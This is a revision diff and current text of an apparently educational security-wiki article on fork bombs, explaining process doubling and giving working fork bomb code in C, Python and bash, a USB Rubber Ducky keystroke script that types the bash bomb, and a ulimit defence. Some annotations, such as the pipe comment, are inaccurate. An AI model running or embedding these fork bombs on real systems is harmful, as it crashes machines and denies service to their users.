Difference between revisions of "Fork bomb"
(16 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
The Fork Bomb (also called rabbit virus or wabbit) is a memory exhausting Denial of Service (DoS) Attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up. | The Fork Bomb (also called rabbit virus or wabbit) is a memory exhausting Denial of Service (DoS) Attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up. | ||
== Implementation == | == Implementation == | ||
The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child processes will never exceed their completion because they also waiting for their child processes. | |||
1| fork() L1 | |||
/ \ | |||
2| fork() L2 L2 | |||
/ \ / \ | |||
3| fork () L3 L3 L3 L3 | |||
As the code shows the processes double every line so the number of running processes increase relative to <math>2^{n}</math>. | |||
The following section shows some fork bomb example written in different languages. | |||
=== C === | |||
<syntaxhighlight lang="c"> | |||
#include <unistd.h> | |||
int main(void) | |||
{ | |||
for(;;) | |||
fork(); | |||
return 0; | |||
} | |||
</syntaxhighlight> | |||
=== Python === | === Python === | ||
<syntaxhighlight lang="python"> | |||
import os | |||
while True: | |||
os.fork() | |||
</syntaxhighlight> | |||
Command line variant: | |||
<syntaxhighlight lang="bash"> | |||
python -c 'while 1: __import__("os").fork()' | |||
</syntaxhighlight> | |||
=== Unix Bash === | === Unix Bash === | ||
<syntaxhighlight lang="bash"> | |||
:(){ :|:& };: | |||
</syntaxhighlight> | |||
This command line command can be deciphered like this | |||
<syntaxhighlight lang="bash"> | |||
:() # Defines the following function ":" | |||
{ | |||
: # Loads a copy of the function ":" | |||
| # Redirects the Output that it is not seen in the shell | |||
: # Loads a copy of the function ":" | |||
& # Runs the programs as a background process | |||
} | |||
: # Runs the beforehand defined function ":" | |||
</syntaxhighlight> | |||
This command is dangerous because the user issuing it does need any grants. | |||
=== Forkbomb used by USB Rubber Ducky === | |||
Rezky Aulia Efendy et. al. in [4] used a [[USB Rubber Ducky]] to perform the fork bomb on a windows 8 personal computer. The USB Rubber Ducky is a self-typing Keyboard disguised as an USB flash drive. Their implementation opened multiple instances of Microsoft Paint to perform the memory depletion attack. | |||
:(){ :|:& };: | This attack can also be Performed on Unix based Operating systems by using the <code>:(){ :|:& };:</code> command | ||
The Rubber ducky script would look like as follows: | |||
CTRL-ALT t | |||
DELAY 200 | |||
STRING :(){ :|:& };: | |||
ENTER | |||
== Fork bomb prevention == | |||
To prevent the fork bomb form spreading on your device you can limit the the maximum of allowed precesses per user. On Linux Distribution this can be achieved by using the ulimit command. | |||
For example <code>ulimit -u 30</code> would limit the user to a maximum of 30 Processes. | |||
== References == | == References == | ||
Line 55: | Line 86: | ||
[[Category: | [[Category:Basic]] |
Latest revision as of 09:07, 21 May 2020
The Fork Bomb (also called rabbit virus or wabbit) is a memory exhausting Denial of Service (DoS) Attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up.
Implementation
The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child processes will never exceed their completion because they also waiting for their child processes.
1| fork() L1 / \ 2| fork() L2 L2 / \ / \ 3| fork () L3 L3 L3 L3
As the code shows the processes double every line so the number of running processes increase relative to .
The following section shows some fork bomb example written in different languages.
C
#include <unistd.h>
int main(void)
{
for(;;)
fork();
return 0;
}
Python
import os
while True:
os.fork()
Command line variant:
python -c 'while 1: __import__("os").fork()'
Unix Bash
:(){ :|:& };:
This command line command can be deciphered like this
:() # Defines the following function ":"
{
: # Loads a copy of the function ":"
| # Redirects the Output that it is not seen in the shell
: # Loads a copy of the function ":"
& # Runs the programs as a background process
}
: # Runs the beforehand defined function ":"
This command is dangerous because the user issuing it does need any grants.
Forkbomb used by USB Rubber Ducky
Rezky Aulia Efendy et. al. in [4] used a USB Rubber Ducky to perform the fork bomb on a windows 8 personal computer. The USB Rubber Ducky is a self-typing Keyboard disguised as an USB flash drive. Their implementation opened multiple instances of Microsoft Paint to perform the memory depletion attack.
This attack can also be Performed on Unix based Operating systems by using the :(){ :|:& };:
command
The Rubber ducky script would look like as follows:
CTRL-ALT t DELAY 200 STRING :(){ :|:& };: ENTER
Fork bomb prevention
To prevent the fork bomb form spreading on your device you can limit the the maximum of allowed precesses per user. On Linux Distribution this can be achieved by using the ulimit command.
For example ulimit -u 30
would limit the user to a maximum of 30 Processes.
References
[1] https://de.wikipedia.org/wiki/Forkbomb (german version for source code)
[2] https://en.wikipedia.org/wiki/Forkbomb
[3] https://www.geeksforgeeks.org/fork-system-call/
[4] IEEE: Exploring the Possibility of USB based Fork Bomb Attack on Windows Environment